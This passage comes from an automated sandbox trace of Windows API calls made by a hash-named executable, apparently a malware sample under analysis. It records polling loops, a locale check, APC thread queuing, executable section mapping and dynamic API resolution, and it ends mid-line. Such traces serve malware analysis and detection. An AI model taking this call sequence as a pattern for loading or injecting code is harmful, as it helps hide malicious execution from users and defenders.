hHeap=0x2560000) returned 1 [0307.475] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e2510 [0307.475] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e2510 | out: hHeap=0x2560000) returned 1 [0307.475] Sleep (dwMilliseconds=0xb0) [0307.482] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0307.482] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.482] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0307.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0307.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0307.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0307.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0307.487] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0307.487] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0307.488] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27de4f0 [0307.488] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27de4f0 | out: hHeap=0x2560000) returned 1 [0307.488] Sleep (dwMilliseconds=0xb0) [0307.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0307.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0307.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0307.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0307.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0307.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0307.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0307.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0307.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.504] Sleep (dwMilliseconds=0xb0) [0307.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0307.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0307.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0307.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0307.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0307.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0307.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0307.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0307.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.520] Sleep (dwMilliseconds=0xb0) [0307.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0307.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.532] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0307.532] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0307.532] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0307.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0307.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0307.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0307.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0307.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e0500 [0307.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e0500 | out: hHeap=0x2560000) returned 1 [0307.534] Sleep (dwMilliseconds=0xb0) [0307.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0307.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0307.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0307.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0307.549] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0307.549] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0307.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0307.550] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0307.550] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.550] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.550] Sleep (dwMilliseconds=0xb0) [0307.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0307.564] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0307.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0307.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0307.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0307.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.565] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0307.565] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0307.565] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0307.566] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0307.566] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0307.566] Sleep (dwMilliseconds=0x50) [0307.579] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0307.579] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0307.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0307.580] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.580] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0307.580] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0307.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.581] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0307.581] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0307.581] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0307.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.582] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.582] Sleep (dwMilliseconds=0x120) [0307.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0307.595] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0307.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0307.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.596] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0307.596] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0307.596] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0307.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0307.597] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0307.597] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27df4f8 [0307.597] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27df4f8 | out: hHeap=0x2560000) returned 1 [0307.597] Sleep (dwMilliseconds=0xc0) [0307.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0307.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0307.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0307.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0307.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0307.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0307.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0307.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0307.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27db4d8 [0307.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27db4d8 | out: hHeap=0x2560000) returned 1 [0307.614] Sleep (dwMilliseconds=0x60) [0307.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0307.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0307.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0307.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0307.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0307.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0307.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0307.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0307.629] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0307.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0307.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x27e1508 [0307.630] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x27e1508 | out: hHeap=0x2560000) returned 1 [0307.630] Sleep (dwMilliseconds=0x130) [0307.783] GetLocaleInfoA (in: Locale=0x400, LCType=0x5a, lpLCData=0x19ee88, cchData=4 | out: lpLCData="US") returned 3 [0307.789] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x208) returned 0x285acb8 [0307.789] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x285acb8, nSize=0x104 | out: lpFilename="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe" (normalized: "c:\\users\\oqxzraykm\\desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe")) returned 0x5f [0307.789] GetLongPathNameW (in: lpszShortPath="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe", lpszLongPath=0x0, cchBuffer=0x0 | out: lpszLongPath=0x0) returned 0x60 [0307.793] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc2) returned 0x285aec8 [0307.793] GetLongPathNameW (in: lpszShortPath="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe", lpszLongPath=0x285aec8, cchBuffer=0x60 | out: lpszLongPath="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe") returned 0x5f [0307.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285acb8 | out: hHeap=0x2560000) returned 1 [0307.799] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x77153000, lpParameter=0x43175ac3, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11c [0307.801] QueueUserAPC (pfnAPC=0x40139f, hThread=0x11c, dwData=0x19ee6c) returned 0x1 [0307.801] WaitForSingleObject (hHandle=0x11c, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0x1080 Thread: id = 3 os_tid = 0x17f0 [0307.946] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xae01) returned 0x27eb4b8 [0307.948] lstrlenW (lpString="C:\\Users\\OqXZRaykm\\Desktop\\a6886a3566a1a98072d67f1aca4a04b5667f97f4df21b2f54d6108293d7c02b7.exe") returned 95 [0307.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8bf920 | out: lpSystemTimeAsFileTime=0x8bf920*(dwLowDateTime=0xa500b6fc, dwHighDateTime=0x1d95b24)) [0307.948] _snwprintf (_Dest=0x8bf8f4, _Count=0x16, _Format="%S%x") [0307.948] _snwprintf (in: _Dest=0x8bf8f4, _Count=0x16, _Format="%S%x" | out: _Dest="Local\\12d31") returned 11 [0307.948] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x404188, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc8, lpName="Local\\12d31") returned 0x154 [0307.949] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1d0000 [0307.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x20) returned 0x285af98 [0307.955] GetModuleHandleA (lpModuleName="NTDLL.DLL") returned 0x77840000 [0307.955] GetProcAddress (hModule=0x77840000, lpProcName="ZwCreateSection") returned 0x778b1550 [0307.955] GetProcAddress (hModule=0x77840000, lpProcName="ZwMapViewOfSection") returned 0x778b1330 [0307.956] GetProcAddress (hModule=0x77840000, lpProcName="ZwUnmapViewOfSection") returned 0x778b1350 [0307.956] GetProcAddress (hModule=0x77840000, lpProcName="RtlNtStatusToDosError") returned 0x7789cce0 [0307.956] GetProcAddress (hModule=0x77840000, lpProcName="ZwClose") returned 0x778b1180 [0307.956] NtCreateSection (in: SectionHandle=0x8bf8e0, DesiredAccess=0xf001f, ObjectAttributes=0x8bf8c0*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x8bf8d8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x8bf8e0*=0x158) returned 0x0 [0307.956] NtMapViewOfSection (in: SectionHandle=0x158, ProcessHandle=0xffffffff, BaseAddress=0x8bf8e4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x8bf898*=0, ViewSize=0x8bf8a0*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x8bf8e4*=0x1e0000, SectionOffset=0x8bf898*=0, ViewSize=0x8bf8a0*=0xd000) returned 0x0 [0307.958] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77840000 [0307.958] GetProcAddress (hModule=0x77840000, lpProcName="ZwQueryInformationToken") returned 0x778b12c0 [0307.958] GetProcAddress (hModule=0x77840000, lpProcName="ZwOpenProcess") returned 0x778b1310 [0307.958] GetProcAddress (hModule=0x77840000, lpProcName="ZwClose") returned 0x778b1180 [0307.958] GetProcAddress (hModule=0x77840000, lpProcName="ZwOpenProcessToken") returned 0x778b2330 [0307.958] GetProcAddress (hModule=0x77840000, lpProcName="_snwprintf") returned 0x778b5820 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="memcpy") returned 0x778b6fc0 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="strcpy") returned 0x778b8130 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="sprintf") returned 0x778b8010 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="mbstowcs") returned 0x778b6e30 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="_snprintf") returned 0x778b5790 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="wcstombs") returned 0x778b93b0 [0307.959] GetProcAddress (hModule=0x77840000, lpProcName="memset") returned 0x778b7640 [0307.960] GetProcAddress (hModule=0x77840000, lpProcName="_aulldiv") returned 0x778b4dc0 [0307.960] GetProcAddress (hModule=0x77840000, lpProcName="_allmul") returned 0x778b4ba0 [0307.960] GetProcAddress (hModule=0x77840000, lpProcName="_aullrem") returned 0x778b4ed0 [0307.960] GetProcAddress (hModule=0x77840000, lpProcName="RtlUnwind") returned 0x778a7e60 [0307.960] GetProcAddress (hModule=0x77840000, lpProcName="NtQueryVirtualMemory") returned 0x778b12e0 [0307.960] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x77130000 [0307.960] GetProcAddress (hModule=0x77130000, lpProcName="RaiseException") returned 0x77150510 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="LocalAlloc") returned 0x771503c0 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="HeapAlloc") returned 0x778852c0 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="InterlockedIncrement") returned 0x7714e740 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="InterlockedDecrement") returned 0x7714e7c0 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="HeapFree") returned 0x7714dec0 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="SetEvent") returned 0x77152fe0 [0307.961] GetProcAddress (hModule=0x77130000, lpProcName="GetTickCount") returned 0x77152300 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="GetSystemTimeAsFileTime") returned 0x7714f2f0 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="Sleep") returned 0x77150e60 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="HeapDestroy") returned 0x77150b50 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="HeapCreate") returned 0x771509a0 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="SwitchToThread") returned 0x77147c20 [0307.962] GetProcAddress (hModule=0x77130000, lpProcName="lstrlenA") returned 0x771503a0 [0307.962] 